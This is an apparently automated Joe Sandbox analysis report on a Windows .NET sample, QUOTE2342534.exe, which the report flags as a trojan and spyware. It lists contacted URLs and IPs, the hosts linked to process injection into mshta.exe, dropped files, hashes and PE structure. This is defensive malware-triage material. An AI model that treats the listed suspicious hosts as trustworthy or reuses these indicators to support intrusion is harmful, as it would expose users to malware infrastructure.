                                                                                                                                                http://www.coba168.info/wp-content/themes/hello-elementor/theme.min.css?ver=3.1.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.coba168.infomshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.coba168.info/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.coba168.info/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementomshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://schema.orgmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.ecosia.org/newtab/mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9mshta.exe, 00000008.00000002.4595178953.00000000058D0000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000004260000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://gmpg.org/xfn/11mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.coba168.info/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://schema.org/WPHeadermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.coba168.info/#/schema/logo/image/qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.coba168.info/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.coba168.info/about-us/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.coba168.info/wp-content/uploads/2024/08/5.pngqnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.coba168.info/slot-online/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.coba168.info/comments/feed/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.rtpsilva4d.clickqnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.coba168.info/login/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://schema.org/WPFootermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://yoast.com/wordpress/plugins/seo/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://www.coba168.info/privacy-policy-2/mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.coba168.info/xmlrpc.phpmshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.coba168.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.coba168.info/wp-content/uploads/2024/10/cropped-COBA-168-qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.coba168.info/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.7mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://www.coba168.info/wp-content/themes/hello-elementor/header-footer.min.css?ver=3.1.1mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.coba168.info/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://www.coba168.info/registermshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refermshta.exe, 00000008.00000002.4595178953.0000000004466000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000002DF6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541203
Start date and time: 2024-10-24 15:16:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QUOTE2342534.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@16/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 136
• Number of non-executed functions: 282
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target qnPyaKsYTE.exe, PID 1308 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • VT rate limit hit for: QUOTE2342534.exe
Time        Type               Description
09:17:09    API Interceptor    1x Sleep call for process: QUOTE2342534.exe modified
09:17:11    API Interceptor    15x Sleep call for process: powershell.exe modified
09:17:56    API Interceptor    12201948x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                                              • 68.178.233.113
                                                                                                                                                                                                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNhttps://app.writesonic.com/share/writing-assistant/d140c48b-3642-43bf-a085-e258c1fb4f03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              attachment(1).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 124.157.170.101
                                                                                                                                                                                                                                              https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              • 49.51.77.119
                                                                                                                                                                                                                                              botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                              • 101.34.109.211
                                                                                                                                                                                                                                              PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 124.156.108.17
                                                                                                                                                                                                                                              byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                              • 101.48.49.48
                                                                                                                                                                                                                                              https://api-restauration.basiic.net/fWmcv/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.62.150.176
                                                                                                                                                                                                                                              https://thebatallangroup.taplink.ws/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 49.51.78.226
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                              Entropy (8bit):5.380805901110357
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                              MD5:16AD599332DD2FF94DA0787D71688B62
                                                                                                                                                                                                                                              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                                                                                                                                                                                              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                                                                                                                                                                                              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                              Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.9413677038231105
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              File name:QUOTE2342534.exe
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5:c19949939d08baee86643132d7ce7542
                                                                                                                                                                                                                                              SHA1:5c8f131cb332bb49c68ab04cc2350c224d4d4d5b
                                                                                                                                                                                                                                              SHA256:a99f8a264c968ef7d4815a0bf6d53854d7c26da69adba84750c48c58bfea7384
                                                                                                                                                                                                                                              SHA512:c05c9842cf19000fa8e00b85994869744dac2f2db220accdc9ac096a3b4df0013a735278186cf1cf8b5611d333ca66f21794341bf2ba3e79b443171dea322645
                                                                                                                                                                                                                                              SSDEEP:12288:2Cfia3jk1mxlOsUAYZ2bmbcDAekn6Eb9bbaG8LtIjCeU6Pz/xP+KcFPlF:2Yi44mzOsU32JKFJbbarIjCEb/tcFtF
                                                                                                                                                                                                                                              TLSH:D7F422502AAC5B56D1FBABF5023725A613B6B62F6835F28D4CC618ED04F7F044AD0B1B
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....m...............0.................. ........@.. ....................................@................................
                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                              Entrypoint:0x4bbeea
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xD96D0FA5 [Sat Aug 4 22:41:41 2085 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbbe95 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x630 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb9d78 | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb9ef0 | 0xba000 | 0c4c073aaddb258f9695e5c9b06f954d | False | 0.9543732673891129 | data | 7.948843186706725 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xbc000 | 0x630 | 0x800 | 5f04e635964b3dfbd48b36a21e6378d1 | False | 0.34033203125 | data | 3.484284373634759 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xbe000 | 0xc | 0x200 | 75662875697957c447bf199d02a39469 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xbc090 | 0x3a0 | data | | | 0.4234913793103448 |
| RT_MANIFEST | 0xbc440 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
